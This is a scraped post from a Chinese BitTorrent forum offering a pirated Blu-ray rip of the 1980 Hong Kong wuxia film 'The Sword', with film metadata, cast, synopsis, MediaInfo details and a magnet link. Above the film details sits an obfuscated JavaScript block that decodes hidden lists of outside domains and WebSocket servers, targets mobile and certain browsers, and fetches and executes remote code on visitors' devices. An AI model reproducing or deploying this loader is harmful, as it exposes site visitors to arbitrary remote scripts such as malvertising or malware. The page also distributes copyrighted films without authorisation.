名剑[国粤语音轨/中文字幕]The.Sword.1980.1080p.BluRay.x264.DTS.2Audio-迅雷下载 9.18GB

版主小s 20天前 177

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 名剑 / The Sword

◎片 名 名劍

◎年 代 1980

◎产 地 中国香港

◎类 别 动作 / 爱情 / 武侠 / 古装

◎语 言 粤语

◎上映日期 1980-08-14(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt0080958/

◎豆瓣评分 7.6/10 (2547人评价)

◎豆瓣链接 https://movie.douban.com/subject/1419920/

◎片 长 85分钟

◎导 演 谭家明 Patrick Tam (id:1275088)

◎编 剧 谭家明 Patrick Tam (id:1275088)

刘天赐 Tin-Chi Lau (id:1334280)

卢自强 Chi-Keung Lo (id:1345701)

黄鹰 Ying Wong (id:1316778)

黄鹰 Ying Huang (id:1042798)

蔡继光 Clifford Choi (id:1280705)

◎演 员 郑少秋 Adam Cheng (id:1033184)

徐少强 Norman Chu (id:1048469)

高雄 Eddy Ko (id:1313798)

陈琪琪 Qiqi Chen (id:1316418)

刘兆铭 Lau Siu Ming (id:1313719)

徐杰 Jade Hsu (id:1317248)

魏秋桦 Chiu-hua Wei (id:1222983)

田丰 Feng Tien (id:1019621)

刘一帆 Yat Fan Lau (id:1373999)

李海生 Hoi Sang Lee (id:1274574)

钟国仁 Kwok Yan Chung (id:1409709)

邹文怀 Raymond Chow (id:1016883)

顾嘉辉 Joseph Koo (id:1017256)

黄仲标 Bill Wong (id:1301175)

张耀宗 Peter Cheung (id:1280650)

俞文华 Wen-Hua Yu (id:1423756)

何康乔 Hong-kiu Hoh (id:1416812)

程小东 Siu-Tung Ching (id:1280664)

龙逸升 Tang Tak-Cheung (id:1432102)

周少龙 Shao Lung Chou (id:1344862)

◎标 签 武侠 / 谭家明 / 香港 / 郑少秋 / 香港电影 / 1980 / 徐少强 / 香港新浪潮

◎简 介

“齐物”和“寒星”是两把绝世名剑,江湖人士都想占为己有。“寒星”归剑术名家花千树所有另一把名剑则在剑士李蓦然的手上。李蓦然学成出山,想找花千树比试,但是花千树为躲避络绎不绝的挑战者,行踪隐秘。李蓦然在追寻途中遇到了花千树的女儿盈盈,在与盈盈互生情愫之时,又恰遇自己的昔日情人陈琪琪,此时的陈琪琪一家为人妇,但是心中对李蓦然却仍是无比牵挂。琪琪之夫婿家贪图名剑,又暗恨李蓦然在妻子心中的地位自己永远都无法取代,所以爱极生恨,派手下暗杀李蓦然,李默然受重伤,幸得玄姬相救。盈盈也遇到了危险,李蓦然奋不顾身救了她,花千树遂答应与李蓦然决斗。其间二人并没有以性命相搏,花千树受伤后,二人就结束了战斗,不想徐少强派手下趁花千树受伤之际暗杀了他,不但取走了“寒星”剑还嫁祸给李蓦然。盈盈伤心欲绝,誓为父报仇。琪琪不忍心看二人陷入争斗中,遂将事情相告。得知真相后,李默然与...

  1. General

  2. Unique ID : 29448958030062423374219753884222649276 (0x1627A9BB07D37044EB9D1703639273BC)

  3. Complete name : [email protected]

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 9.18 GiB

  7. Duration : 1 h 29 min

  8. Overall bit rate : 14.7 Mb/s

  9. Movie name : The Sword 1980

  10. Encoded date : UTC 2021-07-10 13:09:12

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 29 min

  25. Bit rate : 11.7 Mb/s

  26. Width : 1 920 pixels

  27. Height : 802 pixels

  28. Display aspect ratio : 2.40:1

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.317

  36. Stream size : 7.28 GiB (79%)

  37. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=25 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=17.8000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Default : Yes

  40. Forced : No


  41. Audio #1

  42. ID : 2

  43. Format : DTS

  44. Format/Info : Digital Theater Systems

  45. Codec ID : A_DTS

  46. Duration : 1 h 29 min

  47. Bit rate mode : Constant

  48. Bit rate : 1 510 kb/s

  49. Channel(s) : 6 channels

  50. Channel layout : C L R Ls Rs LFE

  51. Sampling rate : 48.0 kHz

  52. Frame rate : 93.750 FPS (512 SPF)

  53. Bit depth : 24 bits

  54. Compression mode : Lossy

  55. Stream size : 962 MiB (10%)

  56. Title : Cantonese

  57. Language : Chinese

  58. Default : Yes

  59. Forced : No


  60. Audio #2

  61. ID : 3

  62. Format : DTS

  63. Format/Info : Digital Theater Systems

  64. Codec ID : A_DTS

  65. Duration : 1 h 29 min

  66. Bit rate mode : Constant

  67. Bit rate : 1 510 kb/s

  68. Channel(s) : 6 channels

  69. Channel layout : C L R Ls Rs LFE

  70. Sampling rate : 48.0 kHz

  71. Frame rate : 93.750 FPS (512 SPF)

  72. Bit depth : 24 bits

  73. Compression mode : Lossy

  74. Stream size : 962 MiB (10%)

  75. Title : Mandarin

  76. Language : Chinese

  77. Default : No

  78. Forced : No


  79. Text #1

  80. ID : 4

  81. ID in the original source medium : 4609 (0x1201)

  82. Format : PGS

  83. Muxing mode : zlib

  84. Codec ID : S_HDMV/PGS

  85. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  86. Duration : 1 h 24 min

  87. Bit rate : 16.6 kb/s

  88. Count of elements : 963

  89. Stream size : 10.0 MiB (0%)

  90. Title : chs

  91. Language : Chinese

  92. Default : Yes

  93. Forced : No

  94. Original source medium : Blu-ray


  95. Text #2

  96. ID : 5

  97. ID in the original source medium : 4608 (0x1200)

  98. Format : PGS

  99. Muxing mode : zlib

  100. Codec ID : S_HDMV/PGS

  101. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  102. Duration : 1 h 24 min

  103. Bit rate : 17.9 kb/s

  104. Count of elements : 963

  105. Stream size : 10.8 MiB (0%)

  106. Title : cht

  107. Language : Chinese

  108. Default : No

  109. Forced : No

  110. Original source medium : Blu-ray


  111. Text #3

  112. ID : 6

  113. ID in the original source medium : 4610 (0x1202)

  114. Format : PGS

  115. Muxing mode : zlib

  116. Codec ID : S_HDMV/PGS

  117. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  118. Duration : 1 h 24 min

  119. Bit rate : 12.6 kb/s

  120. Count of elements : 963

  121. Stream size : 7.62 MiB (0%)

  122. Language : English

  123. Default : No

  124. Forced : No

  125. Original source medium : Blu-ray


  126. Menu

  127. 00:00:00.000 : Chapter 01

  128. 00:07:20.273 : Chapter 02

  129. 00:15:47.029 : Chapter 03

  130. 00:23:37.457 : Chapter 04

  131. 00:32:08.927 : Chapter 05

  132. 00:37:44.804 : Chapter 06

  133. 00:42:46.564 : Chapter 07

  134. 00:50:30.360 : Chapter 08

  135. 00:57:59.601 : Chapter 09

  136. 01:05:48.736 : Chapter 10

  137. 01:13:54.430 : Chapter 11

  138. 01:20:08.053 : Chapter 12


TAGS 武侠 动作 古装 爱情

磁力链:
  • magnet:?xt=urn:btih:660E0425D2E097C4DEA703E5DD7E8D6421CE1CEB
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖